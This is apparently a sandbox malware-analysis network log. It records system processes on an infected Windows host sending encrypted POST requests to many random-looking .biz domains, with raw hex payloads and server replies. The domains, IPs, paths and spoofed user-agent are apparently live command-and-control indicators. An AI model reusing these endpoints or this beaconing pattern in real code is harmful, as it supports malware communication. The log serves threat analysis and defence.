                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=c1dc517ceaf9c48277a889e893824514|8.46.123.33|1728394131|1728394131|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              47192.168.2.44988513.251.16.150802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.285326958 CEST349OUTPOST /jaumpxr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: qaynky.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.285342932 CEST778OUTData Raw: 8a 26 b8 45 85 fe 13 c1 fe 02 00 00 9a d6 9a 77 c5 c0 a2 5a 7c cd 83 06 9d 4d 47 40 41 da d9 77 6f a6 a2 bc 6a 13 34 aa 42 46 47 d6 7c bd 53 f7 de c9 18 d6 e2 f6 4b be fc 9c c9 85 0a 1a e4 11 d3 c9 bb 41 84 76 2e ac 15 b8 8a d4 4b e9 e9 dc 14 45
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: &EwZ|MG@Awoj4BFG|SKAv.KE%mA_4g~<]^5bvT5]Tb&-=V2u``eq,dkaAlZDa9e$Xn8B?Uy)53I1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:52.610193968 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:52 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=06a2aba25caf25346dc29bef3145ae2a|8.46.123.33|1728394132|1728394132|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              48192.168.2.449886165.160.13.20804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.392247915 CEST353OUTPOST /ptbejgswjfxl HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.392313004 CEST786OUTData Raw: 64 5f 97 67 bb e5 a6 97 06 03 00 00 ad 65 ab 2d 1c 9b 6a 80 27 23 de 13 87 16 ff 46 23 ad c6 81 01 b7 23 7f c2 6d b2 a0 86 09 91 a0 f3 dc 08 a6 e4 0e 77 50 a5 e7 99 59 05 a4 bf 23 73 58 0d 2f 17 30 11 b6 8c 38 35 8a f4 52 97 d1 9b a2 1d 80 25 95
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: d_ge-j'#F##mwPY#sX/085R%[6T1989xW+U5'QRR>PPaFqB2ia)MUK>e@K^7AnS;\bLX+qr&^i%ggkg*vW%smI`*K
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:52.117394924 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:52 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:52.167762995 CEST352OUTPOST /xgterudimsf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:52.167799950 CEST786OUTData Raw: 5a 3a f4 26 1e 7e b6 78 06 03 00 00 41 5b f2 a5 be ec b2 05 ca 20 1d fe c5 3b 24 71 c1 68 20 61 71 95 83 61 23 ed cf 95 45 e3 7a 3a 9c 77 fb bd 58 81 b5 56 f7 5d aa cb 93 9f a9 a0 b2 7a b4 be 86 46 85 fb cb 76 5c 79 4c 7b 2f 19 cd 54 d9 a8 48 a2
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Z:&~xA[ ;$qh aqa#Ez:wXV]zFv\yL{/TH(F-gXMdBq51EAw_6>d"T>e-F{*a#-^Pl$N[,c&LE-\oQW]cZ|sR3R|4~bUR}*._U
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:52.403785944 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:52 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              49192.168.2.44989854.244.188.177804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:52.714023113 CEST357OUTPOST /mitdmmperwbt HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: oshhkdluh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:52.714023113 CEST786OUTData Raw: 35 20 ae 45 2d 20 32 6a 06 03 00 00 5c ee f0 20 83 61 48 3c 44 cc 62 24 db 92 a7 77 fc fb 5e 4c 76 cd 4f 39 0f ce bc ec c5 d1 89 3b 39 65 ad 26 78 77 33 6c e6 b8 be 34 86 65 14 99 eb f6 2b e0 a1 6c 00 c5 67 f7 88 d2 d7 d4 a8 4b 02 b1 7d ba b8 59
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 5 E- 2j\ aH<Db$w^LvO9;9e&xw3l4e+lgK}Y,LH-{qj2n\h7.*hndU|3Dwz5iBnZT]vD~:KRYd,5n\Ew#^-[kMlH:Zmyt6.:bK8H;
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.452116013 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:53 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=f94f97b7e512bbc6f76f2d7cd43ad3c4|8.46.123.33|1728394133|1728394133|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              50192.168.2.44990344.221.84.105802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.320051908 CEST349OUTPOST /pyts HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: bumxkqgxu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.320067883 CEST778OUTData Raw: 5b aa f1 32 20 73 94 94 fe 02 00 00 48 bf 75 c5 ff 79 b8 ac 57 9a d0 9a 85 1c b7 68 2b 99 ae 16 05 3a f7 82 ea 7a 01 20 68 90 93 c0 28 06 cf 6a 9c 37 30 13 96 30 be e5 f3 b1 15 0b 4a 09 da 03 f0 13 dd 8a 0e df 23 40 31 82 39 ce ff 73 3b 1d 22 10
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: [2 sHuyWh+:z h(j700J#@19s;"x9`=CV!YfIF,jn)P:kP/,s:[=MT:V )P_,=VH@_PiR,m|5{[Hq!#[_`vKoP<h,i
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.785618067 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:53 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=dab213b9be6c78fdb1f33c425e6002b9|8.46.123.33|1728394133|1728394133|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              51192.168.2.449905208.100.26.245804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.522933006 CEST351OUTPOST /ovcqqvbb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.522933006 CEST786OUTData Raw: df 5f 71 b9 dc 2f f0 b1 06 03 00 00 9f 59 e5 67 bc 28 03 94 8c 81 b5 7c 21 e6 2a 60 1f 79 19 68 04 3a ba 81 85 41 b8 f9 15 72 78 c6 a9 7b dd 47 90 37 9d 39 c8 e3 25 d1 1a 5b aa 59 4d bd 91 3a 6d 44 94 11 89 93 c5 09 88 4c 48 57 3a 94 99 8b a0 dc
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: _q/Yg(|!*`yh:Arx{G79%[YM:mDLHW:O@dDgy5X*z+;@,SfV~YirrrSgx.B\cpahM1}P&5\7#}7`YC,G6@7l{I!7
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.124773026 CEST744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:53 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.207379103 CEST348OUTPOST /xphvd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.207379103 CEST786OUTData Raw: 04 ec 86 38 57 4a b2 25 06 03 00 00 cc c1 58 44 e5 2c b6 e8 04 0a bd 02 ea 07 21 73 76 e9 18 92 9b f2 ad af 44 29 35 4b 94 60 0f 1d 89 5b d7 39 db aa 21 b7 22 bb 23 75 27 d6 9a 88 33 f7 36 72 43 e1 1e 06 14 b0 21 d7 da 6f cc bf cb 83 61 01 14 b1
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 8WJ%XD,!svD)5K`[9!"#u'36rC!oa*1aY0q{_m~86s}:B"-JWjohr]7r{"&ecZPo&jj1Gx4Z .G%9P[_Qf
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.323559999 CEST744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:54 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              52192.168.2.44991154.244.188.177802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.279133081 CEST350OUTPOST /hpbkng HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: dwrqljrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.279149055 CEST778OUTData Raw: 66 d8 35 f8 50 d1 5e 75 fe 02 00 00 51 a5 60 82 d5 34 bd f8 15 08 f3 9c 96 19 9a d6 11 87 98 0b e1 ab 80 d6 65 bb f2 ef c1 67 89 5c e6 9a 6e 2b 2a 78 52 63 09 f0 50 ce 7a 69 dd 0e 5f 53 98 c6 c8 d1 11 41 8d 73 c6 be 96 aa 26 e2 bc 74 4a 62 f2 ec
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: f5P^uQ`4eg\n+*xRcPzi_SAs&tJb>{x!Z#L{(%!,8J+"c'}z|`fjmg/v9GyapwP|W]G8z\=lqw!+tgh{8&I-*S
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.013617992 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:54 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=b9ca5fb82da818055ba3fd65e9368bf6|8.46.123.33|1728394134|1728394134|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              53192.168.2.44991334.211.97.45804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.428262949 CEST349OUTPOST /qmkllgvo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: jpskm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.428284883 CEST786OUTData Raw: ff 29 ed cd d6 2f 75 a3 06 03 00 00 25 12 0b 60 59 7c 57 91 71 aa 29 ec 92 c5 1d 51 bb b6 b1 28 59 dc bc c9 e6 66 60 c7 6d e4 cb 5e 90 b3 14 87 7e a7 8f ac 7e 3d ae 22 c8 17 13 c3 60 22 97 ff 2e d0 34 36 dc 9f a1 12 83 84 29 4b 68 83 65 7d da 20
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: )/u%`Y|Wq)Q(Yf`m^~~="`".46)Khe} LEc=: Tt2)j.[RHn!d39R-HqhjBGt~`Rf$9&D"DUm:H.at`h#E7vk,e]Ci9Ck#?
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.171441078 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:55 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=22fdf5a88a6db6b590b7fef9a40ca619|8.46.123.33|1728394135|1728394135|0|1|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
